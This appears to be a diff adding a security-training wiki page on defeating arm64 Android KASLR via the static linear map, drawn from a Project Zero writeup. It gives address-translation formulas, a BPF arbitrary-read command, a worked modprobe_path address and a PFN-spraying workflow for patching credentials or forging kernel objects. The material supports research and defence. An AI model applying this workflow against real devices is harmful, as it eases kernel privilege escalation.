|
| 1 | +# Linux arm64 Static Linear Map KASLR Bypass |
| 2 | + |
| 3 | +{{#include ../../banners/hacktricks-training.md}} |
| 4 | + |
| 5 | +## Overview |
| 6 | + |
| 7 | +Android kernels built for arm64 almost universally enable **`CONFIG_ARM64_VA_BITS=39`** (3-level paging) and **`CONFIG_MEMORY_HOTPLUG=y`**. With only 512 GiB of kernel virtual space available, the Linux developers chose to anchor the **linear map** at the lowest possible kernel VA so that future hot-plugged RAM can simply extend the mapping upward. Since commit `1db780bafa4c`, arm64 no longer even attempts to randomize that placement, which means: |
| 8 | + |
| 9 | +- `PAGE_OFFSET = 0xffffff8000000000` is compiled in. |
| 10 | +- `PHYS_OFFSET` is sourced from the exported `memstart_addr`, which on stock Android devices is effectively constant (0x80000000 today). |
| 11 | + |
| 12 | +As a consequence, **every physical page has a deterministic linear-map virtual address that is independent of the KASLR slide**: |
| 13 | + |
| 14 | +```c |
| 15 | +#define phys_to_virt(p) (((unsigned long)(p) - 0x80000000UL) | 0xffffff8000000000UL) |
| 16 | +``` |
| 17 | +
|
| 18 | +If an attacker can learn or influence a physical address (kernel object, PFN from `/proc/pagemap`, or even a user-controlled page), they instantly know the corresponding kernel virtual address without leaking the randomized primary kernel mapping. |
| 19 | +
|
| 20 | +## Reading `memstart_addr` and confirming the transform |
| 21 | +
|
| 22 | +`memstart_addr` is exported in `/proc/kallsyms` and can be read on rooted devices or via any arbitrary kernel-read primitive. Project Zero used Jann Horn's tracing-BPF helper (`bpf_arb_read`) to dump it directly: |
| 23 | +
|
| 24 | +```bash |
| 25 | +grep memstart /proc/kallsyms |
| 26 | +# ... obtains memstart_addr virtual address |
| 27 | +./bpf_arb_read <addr_of_memstart_addr> 8 |
| 28 | +``` |
| 29 | + |
| 30 | +The bytes `00 00 00 80 00 00 00 00` confirm `memstart_addr = 0x80000000`. Once `PAGE_OFFSET` and `PHYS_OFFSET` are pinned, the arm64 linear map is a static affine transform of any physical address. |
| 31 | + |
| 32 | +## Deriving stable `.data` addresses on devices with a fixed kernel physbase |
| 33 | + |
| 34 | +Many Pixels still decompress the kernel at **`phys_kernel_base = 0x80010000`** on every boot (visible in `/proc/iomem`). Combining that with the static transform yields cross-reboot-stable addresses for any data symbol: |
| 35 | + |
| 36 | +1. Record the randomized kernel virtual address of `_stext` and of your target symbol from `/proc/kallsyms` (or from the exact `vmlinux`). |
| 37 | +2. Compute the offset: `offset = sym_virt - _stext_virt`. |
| 38 | +3. Add the static boot-time physbase: `phys_sym = 0x80010000 + offset`. |
| 39 | +4. Convert to a linear-map VA: `virt_sym = phys_to_virt(phys_sym)`. |
| 40 | + |
| 41 | +Example (`modprobe_path` on a Pixel 9): `offset = 0x1fe2398`, `phys = 0x81ff2398`, `virt = 0xffffff8001ff2398`. After multiple reboots, `bpf_arb_read 0xffffff8001ff2398` returns the same bytes, so exploit payloads can treat `0xffffff8000010000` as a synthetic, non-randomized base for all `.data` offsets. |
| 42 | + |
| 43 | +This mapping is **RW**, so any primitive that can place attacker data in kernel virtual space (double free, UAF, non-paged heap write, etc.) can patch credentials, LSM hooks, or dispatch tables without ever leaking the true KASLR slide. The only limitation is that `.text` is mapped non-executable in the linear map, so gadget hunting still requires a traditional leak. |
| 44 | + |
| 45 | +## PFN spraying when the kernel physbase is randomized |
| 46 | + |
| 47 | +Vendors such as Samsung randomize the kernel load PFN, but the static linear map is still abusable because PFN allocation is not fully random: |
| 48 | + |
| 49 | +1. **Spray user pages**: `mmap()` ~5 GiB, touch every page to fault it in. |
| 50 | +2. **Harvest PFNs**: read `/proc/pagemap` for each page (or use another PFN leak) to collect the backing PFN list. |
| 51 | +3. **Repeat and profile**: reboot, rerun 100×, build a histogram showing how often each PFN was attacker-controlled. Some PFNs are white-hot (allocated 100/100 times shortly after boot). |
| 52 | +4. **Convert PFN → kernel VA**: |
| 53 | + - `phys = (pfn << PAGE_SHIFT) + offset_in_page` |
| 54 | + - `virt = phys_to_virt(phys)` |
| 55 | +5. **Forge kernel objects in those pages** and steer victim pointers (UAF, overflow, etc.) to the known linear-map addresses. |
| 56 | + |
| 57 | +Because the linear map is identity-mapped RW memory, this technique lets you place fully attacker-controlled data at deterministic kernel VAs even when the real kernel base moves. Exploits can prebuild fake `file_operations`, `cred`, or refcount structures inside the sprayed pages and then pivot existing kernel pointers into them. |
| 58 | + |
| 59 | +## Practical workflow for arm64 Android exploits |
| 60 | + |
| 61 | +1. **Info gathering** |
| 62 | + - Root or use a kernel read primitive to dump `memstart_addr`, `_stext`, and the target symbol from `/proc/kallsyms`. |
| 63 | + - On Pixels, trust the static physbase from `/proc/iomem`; on other devices, prepare the PFN profiler. |
| 64 | +2. **Address calculation** |
| 65 | + - Apply the offset math above and cache the resulting linear-map VAs in your exploit. |
| 66 | + - For PFN spraying, keep a list of "reliable" PFNs that repeatedly land in attacker memory. |
| 67 | +3. **Exploit integration** |
| 68 | + - When an arbitrary write is available, directly patch targets such as `modprobe_path`, `init_cred`, or security ops arrays at the precomputed addresses. |
| 69 | + - When only a heap corruption exists, craft fake objects in the known-supervised pages and repoint victim pointers to those linear-map VAs. |
| 70 | +4. **Verification** |
| 71 | + - Use `bpf_arb_read` or any safe read primitive to sanity-check that the computed address contains the expected bytes before destructive writes. |
| 72 | + |
| 73 | +This workflow eliminates the KASLR-leak stage for data-centric kernel exploits on Android, which drastically lowers exploit complexity and improves reliability. |
| 74 | + |
| 75 | +## References |
| 76 | + |
| 77 | +- [Project Zero - Defeating arm64 Linux KASLR by Exploiting the Static Linear Map and Kernel Physical Placement on Android](https://projectzero.google/2025/11/defeating-kaslr-by-doing-nothing-at-all.html) |
| 78 | + |
| 79 | +{{#include ../../banners/hacktricks-training.md}} |
0 commit comments